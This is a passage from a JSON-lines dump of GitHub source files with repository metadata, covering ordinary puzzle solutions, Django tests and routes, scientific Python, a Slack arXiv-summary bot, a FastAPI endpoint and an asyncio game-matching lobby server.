plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarMin)\nplt.plot(range(0,G),TstarMin)\nplt.plot(range(0,G),LstarMin)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Best Cost Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n\nfig3 = plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarPAve)\nplt.plot(range(0,G),TstarPAve)\nplt.plot(range(0,G),LstarPAve)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Parent Average Cost Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n\nfig4 = plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarAve)\nplt.plot(range(0,G),TstarAve)\nplt.plot(range(0,G),LstarAve)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Population Average Cost Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n################################# Plotting Best Solution ###############################################################\nfor i in range(4):\n print([i+1, Lam[:, i].T, Pi[i]])","repo_name":"mohamed1249/Upwork-Projects","sub_path":"Dubai2/Drones 2.py","file_name":"Drones 2.py","file_ext":"py","file_size_in_byte":15745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33156642649","text":"class Solution:\n\tdef canConstruct(self, ransomNote: str, magazine: str) -> bool:\n\t\tcount = [0] * 26\n\n\t\tfor c in ransomNote:\n\t\t\tcount[ord(c)-97] += 1\n\t\t\n\t\tfor c in magazine:\n\t\t\tcount[ord(c)-97] -= 1\n\t\t\n\t\tfor c in count:\n\t\t\tif c > 0:\n\t\t\t\treturn False\n\t\t\n\t\treturn True\n","repo_name":"IamFaizanKhalid/problem-solving","sub_path":"leetcode.com/problems/ransom-note/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40943552424","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom wiki.models import Page\n\n\nclass WikiTests(TestCase):\n def test_detail_page(self):\n # Instance of user to test the pages\n user = User.objects.create()\n\n # Create a test detail page\n Page.objects.create(title=\"Test\", content=\"test content\", author=user)\n\n # Making a GET request to the home page\n res = self.client.get('/')\n\n # Very a 200 response\n self.assertEqual(res.status_code, 200)\n result = res.context['pages']\n\n # Check if we got out test page\n self.assertQuerysetEqual(\n result,\n ['']\n )\n\n def test_create_page(self):\n # Instance of user to test the pages\n user = User.objects.create()\n\n # Post data to be sent via the form\n post_data = {\n 'title': 'Test',\n 'content': 'test content',\n 'author': user.id\n }\n\n # Request to create a post\n res = self.client.post('/create/', data=post_data)\n\n # Verify our response\n self.assertEqual(res.status_code, 302)\n\n # Get object to test\n page_object = Page.objects.get(title='Test')\n\n # Check that the page object was created in the test db\n self.assertEqual(page_object.title, 'Test')\n","repo_name":"Andre-Williams22/Personal-Wiki","sub_path":"wiki/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11398308642","text":"#Michael Claveria\n#Digital factorials\n\n'''\nFind the sum of all numbers that are equal to the sum of the factorials of the digits\n'''\n\nimport math\n\n#get the sum of the digit factorials of a number n\n#for example 145 is 1! + 4! + 5! = 1 + (4 * 3 * 2 * 1) + (5 * 4 * 3 * 2 * 1) = 145\ndef digFactorial(n):\n nString = str(n)\n fSum = 0\n for i in nString:\n fSum += math.factorial(int(i))\n return fSum\n\n#Count the number of curious numbers from 3 to span\ndef findCurious(span):\n cSum = 0\n for i in range(3, span + 1):\n if digFactorial(i) == i:\n print(i)\n cSum += i\n return cSum\n\nprint('final sum is', findCurious(1000000))\n","repo_name":"mclaveria/Project_Euler","sub_path":"Problem034_Digit_Factorials.py","file_name":"Problem034_Digit_Factorials.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73869448781","text":"from sympy import *\n\ninit_printing(use_unicode=True)\n\n# Spatial variable\nx = Symbol(\"x\", real=True)\n\n# Domain length\nL = Symbol(\"L\", real=True, positive=True)\n\n\n# Setup linear element\nNelements = 2 \nNnodes = Nelements + 1\n\n# Setup the grid\nxnodes = [Integer(0), L/3, L] # I use Integer(0) to make sure that all xnodes are SymPy objects\nh = [xnodes[i+1]-xnodes[i] for i in range(Nnodes-1)]\n\nassert(len(xnodes) == Nnodes)\nassert(len(h) == Nelements)\n\n\n# Setup basis functions\nNfuncs = []\n\n# First\ncond1 = (x >= xnodes[0]) & (x <= xnodes[1])\nf1 = (xnodes[1] - x)/h[0]\nNfuncs.append( Piecewise( (f1, cond1), (0, True) ) )\n\n# Second\ncond1 = (x >= xnodes[0]) & (x <= xnodes[1])\nf1 = ( x - xnodes[0])/h[0]\n#\ncond2 = (x >= xnodes[1]) & (x <= xnodes[2])\nf2 = (xnodes[2] - x)/h[1]\n#\nNfuncs.append( Piecewise( (f1, cond1), (f2, cond2), (0, True) ) )\n\n# Third\ncond1 = (x >= xnodes[Nnodes-2]) & (x <= xnodes[Nnodes-1])\nf1 = (x - xnodes[Nnodes-2])/h[Nnodes-2]\nNfuncs.append( Piecewise( (f1, cond1), (0, True) ) )\n\n","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"simple_FEM_sympy/codes/setup_problem_01.py","file_name":"setup_problem_01.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"41963161957","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^viewTodo$', views.view_todo),\n url(r'^addToTodo/(?P[1-9]+)/$', views.create_todo),\n\t url(r'^deleteTodo/(?P[1-9]+)/$', views.delete_todo),\n\t url(r'^completeTodo/(?P[1-9]+)/$', views.complete_todo),\n url(r'^viewList$', views.view_lists),\n url(r'^addToList$', views.create_list),\n url(r'^deleteList/(?P[1-9]+)/$', views.delete_list),\n url(r'^newList$', views.view_list_form),\n url(r'^editList/(?P[1-9]+)/$', views.edit_list_form),\n url(r'^editTodo/(?P[1-9]+)/$',views.edit_todo_form),\n url(r'^changeList/(?P[1-9]+)/$', views.edit_list),\n url(r'^changeTodo/(?P[1-9]+)/$', views.edit_todo),\n\n #User accounts stuff\n\n\n]\n","repo_name":"ironbila/Scenario1","sub_path":"project-dir/project-dir/backend/todolist/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28006325456","text":"n = int(input())\nvotes = {}\nfor i in range(n):\n s = input()\n if s in votes:\n votes[s] += 1\n else:\n votes[s] = 1\n\nans = max(votes, key=votes.get)\nprint(ans)","repo_name":"kaneda05/AtCoder","sub_path":"conpe/ABC231/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43199558587","text":"from base64 import b64decode\n\nfrom datetime import datetime\nfrom dateutil import parser\n\n__all__ = ['Attachment']\n\n\nclass Attachment(object):\n def __init__(self, name, content, outlook_id=None, size=None, last_modified=None, content_type=None):\n # type: (str, str, str, int, datetime, str) -> None\n self.name = name\n\n self._content = content\n self.bytes = b64decode(content)\n\n self.outlook_id = outlook_id\n self.size = size\n self.last_modified = last_modified\n self.content_type = content_type\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n @classmethod\n def json_to_attachment(cls, account, api_json):\n outlook_id = api_json.get('Id')\n name = api_json.get('Name')\n\n content = api_json.get('ContentBytes', None)\n size = api_json.get('Size', None)\n content_type = api_json.get('ContentType', None)\n\n last_modified = api_json.get('LastModifiedDateTime', None)\n if last_modified is not None:\n parser.parse(last_modified, ignoretz=True)\n\n return Attachment(name, outlook_id=outlook_id, content=content, size=size,\n content_type=content_type, last_modified=last_modified)\n\n @classmethod\n def json_to_attachments(cls, account, api_json):\n return [cls.json_to_attachment(account, value) for value in api_json['value']]\n\n def api_representation(self):\n \"\"\" Used for uploading attachments - less information is required than what we receive from the API \"\"\"\n return {'@odata.type': '#Microsoft.OutlookServices.FileAttachment', 'Name': self.name,\n 'ContentBytes': self._content}\n","repo_name":"JensAstrup/pyOutlook","sub_path":"pyOutlook/core/attachment.py","file_name":"attachment.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"47"} +{"seq_id":"42760225096","text":"import sys\nfrom collections import deque\n\ns = []\nfor _ in range(4) :\n s.append(deque(list(input())))\n\nk = int(input())\nR = [list(map(int,input().split())) for _ in range(k)]\n\ndef check_right(num, dir) :\n if num > 3 :\n return \n \n if s[num][6] != s[num-1][2] :\n check_right(num + 1, -dir)\n s[num].rotate(dir)\n\n\ndef check_left(num ,dir) :\n if num < 0 :\n return \n\n if s[num][2] != s[num+1][6] :\n check_left(num - 1, -dir)\n s[num].rotate(dir)\n\n\nfor i in range(k) :\n num = R[i][0] - 1\n direction = R[i][1]\n\n check_right(num + 1, -direction)\n check_left(num - 1, -direction)\n\n s[num].rotate(direction)\n\n\nanswer = 0\n\nif s[0][0] == \"1\" :\n answer += 1\nif s[1][0] == '1' :\n answer += 2\nif s[2][0] == '1' :\n answer += 4\nif s[3][0] == '1' :\n answer += 8\n\nprint(answer)\n","repo_name":"TwinkleRing/Backjoon-Study","sub_path":"9주차 문제 풀이/14891(톱니 바퀴).py","file_name":"14891(톱니 바퀴).py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27258709960","text":"import os\nimport sys\nimport numpy as np\n\nclass combine_fit:\n\n def __init__(self, objectives, weights = None):\n self.objectives = objectives\n if weights == None:\n self.weights = np.zeros((len(objectives)), dtype = 'float64')\n self.weights[:] = 1.0/len(objectives)\n else:\n assert len(self.objectives) == len(weights)\n self.weights = np.array(weights)\n return\n\n def initialize(self, pd, ref):\n for i in range(len(self.objectives)):\n self.objectives[i].initialize(pd, ref)\n self.msds = np.zeros((len(self.objectives)), dtype = 'float64')\n self.cycle = 0\n self.fdiagnostics = open('combine_fit.punch', 'w')\n return\n\n def __call__(self):\n self.a_msds = []\n for i in range(len(self.objectives)):\n self.msds[i], a_msd = self.objectives[i].__call__()\n #self.a_msds.append(a_msd)\n self.a_msds += a_msd\n self.msd = np.sum(self.msds * self.weights)\n self.fdiagnostics.write('%s %6.6f\\n' % (self.cycle, self.msd))\n self.cycle += 1\n return self.msd, self.a_msds\n","repo_name":"hopefulp/sandbox","sub_path":"Archive_sand/MOF_plus/ff_gen/ff_gen/objectives/combine_fit.py","file_name":"combine_fit.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32115833083","text":"import pytest\nfrom django.test import override_settings\n\nfrom tests.factories.pages import TranslatablePageFactory, WagtailPageFactory\nfrom tests.factories.sites import SiteFactory, create_site_tree\nfrom wagtailtrans.templatetags import translations_wagtail_admin, wagtailtrans_tags\n\n\n@pytest.mark.django_db\nclass TestWagtailtransTags:\n\n def test_get_translations_util(self, languages):\n pages = create_site_tree(languages[0])\n site = pages[0].get_site()\n for language in languages[1:]:\n create_site_tree(language, site=site)\n\n translations = wagtailtrans_tags._get_translations(pages[1])\n language_codes = [l.code for l in translations.keys()]\n assert 'en' in language_codes\n assert 'es' in language_codes\n assert 'fr' in language_codes\n assert 'de' in language_codes\n assert 'nl' in language_codes\n\n translations = wagtailtrans_tags._get_translations(pages[1], include_self=False)\n language_codes = [l.code for l in translations.keys()]\n assert 'en' not in language_codes\n assert 'es' in language_codes\n assert 'fr' in language_codes\n assert 'de' in language_codes\n assert 'nl' in language_codes\n\n def test_get_translations(self, languages):\n site = SiteFactory()\n pages = create_site_tree(languages[0], site=site)\n for language in languages[1:]:\n create_site_tree(language, site=site)\n\n assert not hasattr(pages[0], 'language')\n translations = wagtailtrans_tags._get_translations(pages[0])\n\n language_codes = [l.code for l in translations.keys()]\n assert language_codes[0] == 'en'\n assert language_codes[1] == 'es'\n assert language_codes[2] == 'fr'\n assert language_codes[3] == 'de'\n assert language_codes[4] == 'nl'\n\n\n@pytest.mark.django_db\ndef test_get_canonical_pages_for_delete(languages):\n page = create_site_tree(languages[0])[1]\n for lang in languages[1:]:\n page.create_translation(lang, copy_fields=True)\n\n canonical_pages = translations_wagtail_admin.get_canonical_pages_for_delete(page)\n assert page not in canonical_pages\n assert languages[1:].count() == canonical_pages.count()\n\n non_canocial_page = WagtailPageFactory(path='/root')\n assert not translations_wagtail_admin.get_canonical_pages_for_delete(non_canocial_page)\n\n with override_settings(WAGTAILTRANS_SYNC_TREE=False):\n assert not translations_wagtail_admin.get_canonical_pages_for_delete(page)\n","repo_name":"wagtail/wagtailtrans","sub_path":"tests/unit/test_templatetags.py","file_name":"test_templatetags.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"47"} +{"seq_id":"37927968190","text":"import os\nimport re\n\nimport config\nimport user_interfaces\nimport utils\nfrom arxiv import SortCriterion\nfrom dotenv import load_dotenv\nfrom exceptions import DocumentAlreadyVectorizedException\nfrom models import DocumentHandler, Searcher\nfrom slack_bolt import Ack, App, BoltContext, Say\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\nfrom slack_sdk.models.blocks import ContextBlock, MarkdownTextObject\nfrom slack_sdk.web.client import WebClient\n\n# load secret tokens to environmental variables\nload_dotenv(dotenv_path=\".env\")\n# Initialize app with BOT_TOKEN\napp = App(token=os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n# initialize utility classes\ndoc_handler = DocumentHandler(\n llm_model_name_or_path=config.LLM_MODEL_NAME_OR_MODEL_PATH,\n deepl_token=os.environ[\"DEEPL_AUTH_TOKEN\"],\n)\nsearcher = Searcher(initial_query=config.INITIAL_QUERY)\n\n\n# open modal when command is issued\n@app.command(\"/searchnow\")\ndef searchnow(\n ack: Ack,\n body: dict,\n client: WebClient,\n context: BoltContext,\n):\n ack()\n modal = user_interfaces.SelectSearchMethodModal()\n # save channel_id as a session variable.\n # channel_id should be embedded in modal every time\n # so that channel_id can be retrievable in later handlers.\n modal.private_metadata = context.channel_id\n client.views_open(trigger_id=body[\"trigger_id\"], view=modal)\n\n\n# change input areas of the modal when radio button is selected\n@app.action(\"search_method-select-action\")\ndef update_search_modal(\n ack: Ack,\n body: dict,\n client: WebClient,\n):\n ack()\n\n channel_id = body[\"view\"][\"private_metadata\"]\n action = body[\"actions\"][0]\n search_type: str = action[\"selected_option\"][\"value\"]\n if search_type == \"search_with_url\":\n modal = user_interfaces.SearchThesisWithURLModal()\n modal.private_metadata = channel_id\n client.views_update(\n view_id=body[\"view\"][\"id\"],\n hash=body[\"view\"][\"hash\"],\n view=modal,\n )\n elif search_type == \"search_with_conditions\":\n modal = user_interfaces.SearchThesisWithConditionsModal()\n modal.private_metadata = channel_id\n client.views_update(\n view_id=body[\"view\"][\"id\"],\n hash=body[\"view\"][\"hash\"],\n view=modal,\n )\n\n\n# receive submission of the modal\n@app.view(re.compile(\"modal_search_thesis_with_.+\"))\ndef handle_search_modal(ack: Ack, view: dict, body: dict, client: WebClient, say: Say):\n ack()\n\n user_id: str = body[\"user\"][\"id\"]\n channel_id: str = view[\"private_metadata\"]\n search_type: str = view[\"callback_id\"]\n if search_type == \"modal_search_thesis_with_url\":\n thesis_url: str = view[\"state\"][\"values\"][\"thesis-url-input-block\"][\n \"url-input-action\"\n ][\"value\"]\n if not thesis_url.startswith(\"https://arxiv.org/abs/\"):\n say(\n channel=channel_id,\n text=\"URLは `https://arxiv.org/abs/xxxx.xxxxx` の形式で指定してください。\",\n blocks=[\n ContextBlock(\n elements=[\n MarkdownTextObject(\n text=\"URLは `https://arxiv.org/abs/xxxx.xxxxx` の形式で指定してください。\"\n )\n ]\n ),\n ],\n )\n return\n\n thesis_id = thesis_url.split(\"/\")[-1]\n docs = searcher.search(id_list=[thesis_id])\n if not docs:\n say(\n channel=channel_id,\n text=f\"IDが `{thesis_id}` の論文が見つかりませんでした。\",\n blocks=[\n ContextBlock(\n elements=[\n MarkdownTextObject(\n text=f\"IDが `{thesis_id}` の論文が見つかりませんでした。\"\n )\n ]\n ),\n ],\n )\n return\n\n client.chat_postEphemeral(\n channel=channel_id, user=user_id, text=\"論文を要約しています。少しお待ちください。\"\n )\n doc = doc_handler.summarize_documents(docs)[0]\n say(\n channel=channel_id,\n text=doc.arxiv_doc.title,\n blocks=doc.get_formatted_message(),\n )\n elif search_type == \"modal_search_thesis_with_conditions\":\n (\n query,\n max_results,\n ) = utils.get_query_and_max_desired_results_from_modal_submission(\n response_view=view\n )\n docs = searcher.search(\n query=query, max_results=max_results, sort_by=SortCriterion.Relevance\n )\n if not docs:\n say(\n channel=channel_id,\n text=\"条件に合致する論文が見つかりませんでした。\",\n blocks=[\n ContextBlock(\n elements=[MarkdownTextObject(text=\"条件に合致する論文が見つかりませんでした。\")]\n ),\n ],\n )\n return\n\n client.chat_postEphemeral(\n channel=channel_id, user=user_id, text=\"論文を要約しています。少しお待ちください。\"\n )\n docs = doc_handler.summarize_documents(docs=docs)\n for doc in docs:\n say(\n channel=channel_id,\n text=doc.arxiv_doc.title,\n blocks=doc.get_formatted_message(),\n )\n\n\n@app.action(\"discuss-button-action\")\ndef process_document_for_discussion(ack: Ack, body: dict, say: Say):\n ack()\n\n thread_id = body[\"message\"][\"ts\"]\n thesis_id = body[\"actions\"][0][\"value\"]\n\n say(text=f\"<@{body['user']['id']}> 論文を熟読しています。しばらくお待ちください...\", thread_ts=thread_id)\n\n try:\n doc_handler.convert_pdf_into_vector_db(thread_id=thread_id, thesis_id=thesis_id)\n except DocumentAlreadyVectorizedException as e:\n print(e)\n say(\n text=f\"<@{body['user']['id']}> この論文はすでに読み込んであります! このbotをメンションして何でも聞いてください。\",\n thread_ts=thread_id,\n )\n else:\n say(\n text=f\"<@{body['user']['id']}> 準備ができました! このbotをメンションして何でも聞いてください。\",\n thread_ts=thread_id,\n )\n\n\n@app.event(\"app_mention\")\ndef talk_about_document(event: dict, context: BoltContext, say: Say):\n # ignore unrelated messages\n if \"thread_ts\" not in event:\n return\n if not context.channel_id:\n return\n\n # remove mention symbol from text\n question = re.sub(pattern=\"<@.+>\", repl=\"\", string=event[\"text\"])\n thread_id = event[\"thread_ts\"]\n try:\n answer, source_docs = doc_handler.answer_question_with_source_documents(\n thread_id=thread_id, question=question\n )\n except FileNotFoundError: # when vector db was not found for this thesis\n say(text=\"まだこの論文はちゃんと読んでいないようです。先にDiscuss it!ボタンを押してください。\", thread_ts=thread_id)\n else:\n source_pages = [doc.metadata[\"page\"] + 1 for doc in source_docs]\n source_pages = map(str, sorted(list(set(source_pages))))\n say(\n text=f\"[ 回答の参考にしたページ: {','.join(source_pages)} ]\\n\" + answer,\n thread_ts=thread_id,\n )\n\n\nif __name__ == \"__main__\":\n SocketModeHandler(app, os.environ[\"SLACK_APP_TOKEN\"]).start()\n","repo_name":"t0d4/arxiv-slack-bot","sub_path":"arxiv-slack-bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"69861717263","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom chat_bot.qa_handler import ask_question\nfrom pydantic import BaseModel, Field\n\n\napp = FastAPI()\n\norigins = [\"http://localhost:8080\"]\n\n#CORSを回避\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nclass Message(BaseModel):\n text: str = Field(title=\"Request message to LLM.\", max_length=1000)\n\nclass LLMResponse(BaseModel):\n text: str\n\n@app.get(\"/test\")\ndef test():\n return {}\n\n@app.post(\"/llm\")\ndef response (message:Message) ->LLMResponse:\n answer = ask_question(message.text)\n return LLMResponse(text=answer)\n ","repo_name":"shunX03/sn-langchain","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72565822223","text":"def part1():\n file = open('day1.dat', 'r')\n lines = file.readlines()\n\n lastNumber = 100000\n\n count = 0\n\n for line in lines:\n number = int(line.strip())\n\n if number > lastNumber:\n count = count + 1\n\n lastNumber = number\n\n print(\"Part 1: \" + str(count))\n\n\ndef part2():\n # Step 1: Create a new array of \"triplets\"\n sums = []\n\n file = open('day1.dat', 'r')\n lines = file.readlines()\n\n for i in range(2, len(lines), 1):\n total = int(lines[i]) + int(lines[i - 1]) + int(lines[i - 2])\n sums.append(total)\n\n # Step 2: Now analyze those triplets\n lastSum = 100000\n\n count = 0\n\n for sum in sums:\n if sum > lastSum:\n count = count + 1\n\n lastSum = sum\n\n print(\"Part 2: \" + str(count))\n\n\npart1()\npart2()","repo_name":"bciccolo/AoC-2021","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35992166115","text":"import asyncio\nfrom _thread import *\nfrom matching_data_structure import *\nimport time\n\nHOST = '0.0.0.0'\nPORT = 3098\nTRY_MATCH = 0\nRETRY_MATCH = 1\nFIRST_PLAYER = 1\nSECOND_PLAYER = 2\n\n\nclass Lobby:\n def __init__(self):\n self.matching_list = [] # 매칭 요청한 유저들 담을 큐 객체\n self.user_list = [] # 서버에 접속한 유저 소켓 저장할 리스트\n self.room_num = 1\n self.accept_dic = {}\n\n print(\"start matching queue\")\n asyncio.run(self.main())\n\n # 매칭 잡힘\n async def matching_catch_thread(self, my_write, opponent_write):\n try:\n print(\"유저id : \" + str(my_write[1]) + str(opponent_write[1]))\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_catch.value,\n MatchingResult.success.value,\n my_write[1]).serialize()\n my_write[0].write(response)\n await my_write[0].drain()\n\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_catch.value,\n MatchingResult.success.value,\n opponent_write[1]).serialize()\n opponent_write[0].write(response)\n await opponent_write[0].drain()\n\n times = 0\n while times < 20:\n await asyncio.sleep(0.3)\n # 둘다 매칭 수락함.\n print(\"시간 대기중 : \" + str(self.accept_dic[my_write[1]]) + \" \" + str(self.accept_dic[opponent_write[1]]))\n if self.accept_dic[my_write[1]] == 1 and self.accept_dic[opponent_write[1]] == 1:\n await self.accept_response(my_write, opponent_write)\n return 0\n times += 1\n\n # 10초가 지나면\n # 내가 수락 상대방 거절\n if self.accept_dic[my_write[1]] == 1 and (self.accept_dic[opponent_write[1]] == 0 or\n self.accept_dic[opponent_write[1]] == -1):\n await self.retry_request_matching(my_write[0])\n await self.reject_response(opponent_write[0])\n\n # 내가 거절 상대방 수락\n elif self.accept_dic[opponent_write[1]] == 1 and (self.accept_dic[my_write[1]] == 0 or\n self.accept_dic[my_write[1]] == -1):\n await self.retry_request_matching(opponent_write[0])\n await self.reject_response(my_write[0])\n # 둘다 거절\n else:\n await self.reject_response(my_write[0])\n await self.reject_response(opponent_write[0])\n except Exception as e:\n print(\"매칭 도중 유저 나감\")\n self.matching_remove(my_write, opponent_write)\n\n # 매칭 쓰레드\n async def matching_queue_thread(self):\n while True:\n await asyncio.sleep(0.1)\n time.sleep(0.5)\n if len(self.matching_list) >= 2:\n #유저 추출\n users = []\n users.append(self.matching_list[0])\n del self.matching_list[0]\n users.append(self.matching_list[0])\n del self.matching_list[0]\n\n #매칭된 두 유저 dic 0으로 초기화 -> 클라이언트로부터 수락 요청시 1, 거절 요청시 -1 처리\n self.accept_dic[users[0][1]] = 0\n self.accept_dic[users[1][1]] = 0\n asyncio.create_task(self.matching_catch_thread(users[0], users[1])) #0: writer 1: id\n print(\"매칭 잡힘\")\n\n # 상대방 거절 이후 재매칭\n async def retry_request_matching(self, retry_user):\n for user in self.user_list: #모든 유저 리스트\n if user[1] == retry_user:\n await self.request_matching(user[1], user[2], RETRY_MATCH)\n\n # 매칭 둘다 완료\n async def accept_response(self, my_write, opponent_write):\n message = MatchingCompleteData(PacketId.matching_complete.value,\n self.room_num,\n my_write[1],\n FIRST_PLAYER).serialize()\n my_write[0].write(message)\n message = MatchingCompleteData(PacketId.matching_complete.value,\n self.room_num,\n opponent_write[1],\n SECOND_PLAYER).serialize()\n opponent_write[0].write(message)\n self.room_num += 1 #각 방번호 부여\n\n # 매칭 거절\n async def reject_response(self, writer):\n #매칭 잡힌 후 10초뒤에 전달되는 메시지\n message = MatchingRejectData(PacketId.matching_reject.value, MatchingResult.success.value).serialize()\n writer.write(message)\n await writer.drain()\n\n # 매칭 소켓 핸들러\n async def lobby_handle(self, reader, writer):\n addr = writer.get_extra_info('peername') # 0: IP 1: PORT\n print(str(addr[0]) + \" \" + str(addr[1]) + \"connect\")\n user_id = await reader.read(100)\n user_id = user_id.decode()\n print(\"userid : \" + str(int(user_id)))\n self.user_list.append([reader, writer, int(user_id)])\n\n while True:\n try:\n message = await reader.read(100)\n if not message:\n self.remove(int(user_id))\n break\n await self.divide_process(int.from_bytes(message[0:4], byteorder='big'), message, writer, int(user_id))\n except Exception as e:\n print(e)\n #remove\n break\n\n # 메세지 처리\n async def divide_process(self, packet_id, message, writer, user_id):\n # 클라이언트로부터 매칭 시작 요청\n if packet_id == PacketId.matching_data.value:\n packet_data = MatchingData(message).deserialize()\n if packet_data[1] == MatchingPacketId.matching_request.value:\n print(str(user_id) + \" : 매칭 요청\")\n await self.request_matching(writer, user_id, TRY_MATCH)\n # 클라이언트로부터 매칭 수락, 거절 여부 메시지\n elif packet_id == PacketId.matching_decision.value:\n\n packet_data = MatchingDecisionData(message).deserialize()\n #수락 눌렀을 시\n if packet_data[1] == MatchingDecision.matching_accept.value:\n print(\"수락\")\n self.accept_matching(packet_data)\n elif packet_data[1] == MatchingDecision.matching_reject.value:\n print(\"거절\")\n self.reject_matching(packet_data)\n # 클라이언트로부터 매칭 취소\n elif packet_id == PacketId.matching_cancel.value:\n self.cancel_matching(user_id)\n\n # 매칭 등록\n async def request_matching(self, writer, user_id, match_type):\n self.matching_list.append([writer, user_id]) # 매칭 요청 유저 리스트에 삽입\n # response 전송\n if match_type == TRY_MATCH: # 매칭 요청으로 매칭 메세지 전송\n response = MatchingResponseData(PacketId.matching_response.value,\n MatchingPacketId.matching_response.value,\n MatchingResult.success.value,\n user_id).serialize()\n print(\"matching regist\")\n writer.write(response)\n await writer.drain()\n elif match_type == RETRY_MATCH: # 상대방이 거절한 유저 재매칭 메세지 전송\n response = MatchingRetryData(PacketId.matching_retry.value, MatchingResult.success.value).serialize()\n writer.write(response)\n await writer.drain()\n\n print(str(user_id) + \" : 매칭 ���답 전송\")\n\n # 매칭 수락\n def accept_matching(self, packet_data):\n self.accept_dic[packet_data[2]] = 1 #수락했다고 알림\n print(str(packet_data[2]) + \" : 매칭 수락\")\n\n # 매칭 거절\n def reject_matching(self, packet_data):\n self.accept_dic[packet_data[2]] = -1 #거절했다 알림\n print(str(packet_data[2]) + \" : 매칭 거절\")\n\n # 매칭 취소\n def cancel_matching(self, user_id):\n for user in self.matching_list:\n if user[1] is user_id:\n self.matching_list.remove(user)\n print(str(user_id) + \" : 매칭 취소 처리\")\n\n async def main(self):\n asyncio.create_task(self.matching_queue_thread())\n server = await asyncio.start_server(self.lobby_handle, HOST, PORT)\n\n address = server.sockets[0].getsockname()\n print({address})\n\n print('Lobby server start')\n print('waiting new client..')\n\n async with server:\n await server.serve_forever()\n\n # 접속 종료 유저 리스트 제거\n def remove(self, user_id):\n for user in self.matching_list:\n if user[1] == user_id:\n print(str(user[1]) + \"님이 매칭 리스트에서 나가셨습니다.\")\n self.matching_list.remove(user)\n break\n for user in self.user_list:\n if user[2] == user_id:\n print(str(user[2]) + \"님이 나가셨습니다.\")\n self.user_list.remove(user)\n break\n\n def matching_remove(self, my, opponent):\n for user in self.matching_list:\n if user[1] == my or user[1] == opponent:\n print(str(user[1]) + \"님이 매칭 리스트에서 나가셨습니다.\")\n self.matching_list.remove(user)\n break\nserver = Lobby()","repo_name":"serverdevcamp/camp4_sercle","sub_path":"src/server/async_lobby_server.py","file_name":"async_lobby_server.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"70534919184","text":"from util import *\n\nclass Repeater:\n def __init__(self, days_delta, exceptions=[], end_date=None):\n self.days_delta = days_delta\n self.exceptions = exceptions\n self.end_date = end_date\n\n if self.days_delta == 0:\n raise InputError(\"Error: cannot have repeater that repeats every 0 days.\")\n\n def __str__(self):\n return 'Repeats every %d days%s%s' % (self.days_delta,\n (\" except for \" + stringify_dates(self.exceptions)) if self.exceptions else \"\",\n \" until \" + self.end_date.date().isoformat() if self.end_date else \"\")\n","repo_name":"asya-bergal/abercal","sub_path":"repeater.py","file_name":"repeater.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4892398237","text":"#!/usr/bin/python3\n\"\"\"\nFabric script to create a backup\n\"\"\"\nfrom fabric.api import local\nfrom 